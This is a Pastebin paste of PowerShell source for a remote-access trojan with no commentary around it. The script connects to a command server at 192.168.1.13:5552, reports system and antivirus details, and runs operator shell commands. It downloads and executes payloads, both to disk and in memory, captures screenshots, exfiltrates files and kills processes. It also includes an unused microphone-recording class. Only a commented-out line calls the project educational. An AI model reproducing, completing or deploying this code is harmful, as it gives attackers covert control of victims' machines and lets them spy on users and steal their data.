SHARE
TWEET

Untitled

a guest Feb 27th, 2020 133 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.    [System.Threading.Thread]::Sleep(10000)
  3. Add-Type -TypeDefinition @"
  4.     using System;
  5.     using System.Runtime.InteropServices;
  6.     using System.ComponentModel;
  7.     namespace RECORD
  8.     {
  9.         public class Commands
  10.         {
  11.             [DllImport("winmm.dll")]
  12.             static extern Int32 mciSendString(string command, string buffer, int bufferSize, IntPtr hwndCallback);
  13.            
  14.              public static void Open()
  15.             {
  16.                 string rt = "";
  17.                 mciSendString("open new type waveaudio alias capture", rt, 0, IntPtr.Zero);
  18.             }
  19.  
  20.              public static void Rec()
  21.             {
  22.                 string rt = "";
  23.                 mciSendString("record capture", rt, 0, IntPtr.Zero);
  24.             }
  25.             public static void Save(string pth)
  26.             {
  27.                 string rt = "";
  28.                 mciSendString("save capture " + pth, rt, 0, IntPtr.Zero);
  29.             }
  30.              public static void Close()
  31.             {
  32.                 string rt = "";
  33.                 mciSendString("close capture", rt, 0, IntPtr.Zero);
  34.             }
  35.  
  36.            
  37.          }
  38.     }
  39. "@
  40. <#
  41. function Show-MessageBox ($title, $msg)
  42. {
  43.  [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
  44.  [Windows.Forms.MessageBox]::Show($msg, $title, [Windows.Forms.MessageBoxButtons]::OK,
  45.     [System.Windows.Forms.MessageBoxIcon]::Warning, [System.Windows.Forms.MessageBoxDefaultButton]::Button1,
  46.     [System.Windows.Forms.MessageBoxOptions]::DefaultDesktopOnly)  
  47. }
  48.  
  49. #Show-MessageBox("ATTENTION: !!! ","This project was created for educational purposes only. Please remove then click OK.")
  50. #Get-WmiObject Win32_PnPEntity | where {$_.caption -match 'camera'}
  51. #>
  52. $spl = "<>"
  53. $vn = "black hat"
  54. $sp= "&&&"
  55. $hostname = "192.168.1.13"
  56. $port = "5552
  57. "
  58. $Path = $env:temp + "\"
  59. $ScriptName = $MyInvocation.MyCommand.Name
  60. $fullPathIncFileName = $MyInvocation.MyCommand.Definition
  61. $WshShell = New-Object -comObject WScript.Shell
  62. $Sh = New-Object -comObject Shell.Application
  63. $Fs = New-Object -comObject Scripting.FileSystemObject
  64.     try
  65.     {
  66.  
  67.     <#
  68.     ' Create a TcpClient.
  69.           ' Note, for this client to work you need to have a TcpServer
  70.           ' connected to the same address as specified by the server, port
  71.           ' combination.
  72.      #>
  73.     $Client = New-Object -TypeName System.Net.Sockets.TcpClient
  74.     $Client.Connect($hostname, $port)
  75.     $tcpStream = $Client.GetStream()
  76.     }
  77.     catch
  78.     {
  79.        
  80.         $_.Exception.Message
  81.     }
  82. function CompressedByteArray([byte[]] $byteArray){
  83.  
  84.     [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
  85.     $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
  86.     $gzipStream.Write($byteArray, 0, $byteArray.Length)
  87.     $gzipStream.Close()
  88.     $output.Close()
  89.    [byte[]] $tmp = $output.ToArray()
  90.     return $tmp
  91. }
  92. function DecompressedByteArray([byte[]] $byteArray){
  93.  
  94.     $input = New-Object System.IO.MemoryStream( , $byteArray)
  95.     $output = New-Object System.IO.MemoryStream
  96.     $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
  97.     $gzipStream.CopyTo($output)
  98.     $gzipStream.Close()
  99.     $input.Close()
  100.     [byte[]] $byteOutArray = $output.ToArray()
  101.     return $byteOutArray
  102. }    
  103.    
  104.    
  105.  
  106. function info {
  107.  
  108.     $mch = [environment]::Machinename
  109.     $usr = [environment]::username
  110.     $SerialNumber = $Fs.GetDrive("c:\").SerialNumber
  111.     $SerialNumber = "{0:X}" -f $SerialNumber
  112.     $HWD = $SerialNumber
  113.    
  114.     $wi = (Get-WmiObject Win32_OperatingSystem).Caption
  115.     $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
  116.     $wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86').replace('?','e');
  117.     $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
  118.     $nanav =""
  119.     if ($av -eq $null)
  120.     {$av = 'nan-av'}
  121.     $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
  122.     if (test-path $e)
  123.     {$nt = '.Net YES'}
  124.     else
  125.     {$nt= '.Net NO'};
  126.      if (test-path 'HKCU:\vdw0rm')
  127.      {$usb = 'TRUE'} else { $usb = 'FALSE'};
  128.     $u = 'PC' + $spl + $vn + '-' + $HWD+ $spl + $usr + $spl + $mch + $spl + $wi + $spl + $av + $spl + $nt + $spl + $usb + $spl + $sp;
  129.      return $u
  130.      
  131.  }
  132.  
  133.  
  134.  
  135. Function process-m{
  136. $ProcRunning =Get-Process
  137.  foreach ($process in $ProcRunning)
  138.     {
  139.    
  140.     $pd += $process.ProcessName+ "|" + $process.id + "|" + $process.path + '<|>'
  141.    
  142.  }  
  143.     return $pd
  144. }
  145.  
  146.  
  147.  
  148. function CMDOS($cmd){
  149.     $WshShell.run("cmd /c " + $cmd + " > " + $Path + "outs.txt & exit",0)
  150.     Start-Sleep -s 1
  151.     $text = [IO.File]::ReadAllText($env:temp + "\outs.txt",[System.Text.Encoding]::Default)
  152.     Remove-Item $env:temp + "\outs.txt"
  153.     return $text
  154. }
  155. while($true) {
  156.  
  157.        
  158.  
  159.  if ($Client.Connected){
  160.          if ($tcpStream.CanRead -And $Client.Available -ge 0 ){
  161.                    
  162.              
  163.                  $buffer = New-Object -TypeName System.Byte[] $Client.ReceiveBufferSize
  164.        
  165.                  $read = $tcpStream.Read($buffer, 0, $Client.ReceiveBufferSize)
  166.          
  167.                  $PP += [System.Text.Encoding]::Default.GetString($buffer, 0,$read)
  168.                    
  169.              
  170.                    
  171.  
  172.                    If ($PP.Contains($sp)){
  173.                    
  174.                           $T = $PP.split($spl)
  175.                      
  176.                           $PP =$null
  177.                    }
  178.                    
  179.      
  180.          
  181.            
  182.                  if ($T[0] -eq 'pc') {
  183.                      
  184.                          $message = info
  185.                        
  186.                          $data = [System.Text.Encoding]::Default.GetBytes($message)
  187.                          $tcpStream.Write($data, 0, $data.Length)
  188.                          $message = $null
  189.                   }
  190.          
  191.                  if ($T[0] -eq 'cl') {
  192.                  
  193.                         exit
  194.                  
  195.                   }
  196.                  
  197.            
  198.                  if ($T[0] -eq 'dis') {
  199.                    
  200.                          $tcpStream.Dispose()
  201.                          $Client.Close()
  202.                        
  203.                   }
  204.                  
  205.                              
  206.                  if ($T[0] -eq 'Mem') {
  207.                  
  208.                     [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring($T[2]))).EntryPoint.invoke($null,$null)
  209.  
  210.                  }
  211.            
  212.                  if ($T[0] -eq 'Dow') {
  213.                    
  214.                          $wc = New-Object System.Net.WebClient
  215.                          $wc.DownloadFile($T[2], $Path + $T[4] )
  216.                          [System.Diagnostics.Process]::Start($Path + $T[4])
  217.  
  218.                  }
  219.        
  220.                  if ($T[0] -eq 'opr'){
  221.                
  222.                          $proc = process-m
  223.                        
  224.                          $data = [System.Text.Encoding]::ASCII.GetBytes('opr'+ $spl + $proc + $sp)
  225.                          $tcpStream.Write($data, 0, $data.Length)
  226.                          $proc = $null
  227.                    
  228.                   }
  229.            
  230.                   if ($T[0] -eq 'prc'){
  231.                
  232.                          $proc = process-m
  233.                        
  234.                          $data = [System.Text.Encoding]::ASCII.GetBytes('process'+ $spl + $proc + $sp)
  235.                          $tcpStream.Write($data, 0, $data.Length)
  236.                          $proc = $null
  237.                    
  238.                   }
  239.                
  240.                   if ($T[0] -eq 'kpr') {
  241.                  
  242.        
  243.                         stop-process -id $T[2]
  244.                    
  245.                   }
  246.              
  247.                   if ($T[0] -eq 'cmd'){
  248.                
  249.                  
  250.                         $data = [System.Text.Encoding]::ASCII.GetBytes('cmd'+ $spl + $sp)
  251.                         $tcpStream.Write($data, 0, $data.Length)
  252.                    
  253.                   }
  254.              
  255.                   if ($T[0] -eq 'sh'){
  256.  
  257.                          $text = CMDOS($T[2])
  258.                          $data = [System.Text.Encoding]::ASCII.GetBytes('sh'+ $spl + $text + $sp)
  259.                          $tcpStream.Write($data, 0, $data.Length)
  260.                          $text = $null
  261.                   }
  262.      
  263.              
  264.                   if ($T[0] -eq 'ocp') {
  265.                  
  266.                         $data = [System.Text.Encoding]::ASCII.GetBytes('ocp'+ $spl + $sp)
  267.                         $tcpStream.Write($data, 0, $data.Length)
  268.                  
  269.                   }
  270.                  
  271.              
  272.                   if ($T[0] -eq 'cap') {
  273.                      
  274.                         $quality = [int]$T[2]
  275.                         Add-Type -AssemblyName System.Windows.Forms
  276.                         Add-type -AssemblyName System.Drawing
  277.                         $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
  278.                         $Width = $Screen.Width
  279.                         $Height = $Screen.Height
  280.                         $Left = $Screen.Left
  281.                         $Top = $Screen.Top
  282.                         $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
  283.                      
  284.                         $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
  285.                        
  286.                         $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
  287.                        
  288.                         $myEncoder = [System.Drawing.Imaging.Encoder]::Quality
  289.                         $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters(1)
  290.                         $encoderParams.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($myEncoder, $quality)
  291.                    
  292.                         $myImageCodecInfo = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders()|where {$_.MimeType -eq 'image/jpeg'}
  293.                    
  294.                         $memory = New-Object System.IO.MemoryStream
  295.                         $memory.Flush()
  296.                         $bitmap.Save($memory,$myImageCodecInfo, $($encoderParams))
  297.      
  298.                         $jpg =[System.Convert]::ToBase64String($memory.ToArray())
  299.                         $data = [System.Text.Encoding]::ASCII.GetBytes('cap'+ $spl + $jpg + $spl + $sp)
  300.                         $tcpStream.Write($data, 0, $data.Length)
  301.                        
  302.                   }
  303.                  
  304.                  
  305.                   if ($T[0] -eq 'uns') {
  306.                  
  307.  
  308.                    exit
  309.                  
  310.                   }
  311.                  
  312.      
  313.                   #
  314.                   if ($T[0] -eq 'img') {
  315.                      
  316.                      $content =[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($T[2]))
  317.                    
  318.                      $data = [System.Text.Encoding]::ASCII.GetBytes('img'+ $spl + $content + $spl + $sp)
  319.                      $tcpStream.Write($data, 0, $data.Length)
  320.                      $content=$null
  321.                   }
  322.                  
  323.        
  324.                  
  325.                
  326.                   if ($T[0] -eq 'cvs') {
  327.                      $data = [System.Text.Encoding]::ASCII.GetBytes('cvs'+ $spl + $sp)
  328.                      $tcpStream.Write($data, 0, $data.Length)
  329.                      
  330.                      
  331.                   }
  332.                    
  333.        
  334.    
  335.                  
  336.  
  337.                  
  338.                   if ($T[0] -eq 'sss') {
  339.                      
  340.                  
  341.                   }
  342.                  
  343.                  
  344.                  
  345.                  
  346.                  
  347.      
  348.          }else {
  349.         $tcpStream.Dispose()
  350.         $Client.Close()
  351.         $Client = New-Object System.Net.Sockets.TcpClient($hostname,$port)
  352.         $tcpStream = $Client.GetStream()
  353.        $PP =$null
  354.         $T = $null
  355.          }
  356.  
  357.  
  358.   }else {
  359.     $tcpStream.Dispose()
  360.     $Client.Close()
  361.     $Client = New-Object System.Net.Sockets.TcpClient($hostname,$port)
  362.     $tcpStream = $Client.GetStream()
  363.    $PP =$null
  364.     $T = $null
  365.  }
  366.  
  367.  
  368. Start-Sleep -m 5
  369.  
  370.  }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top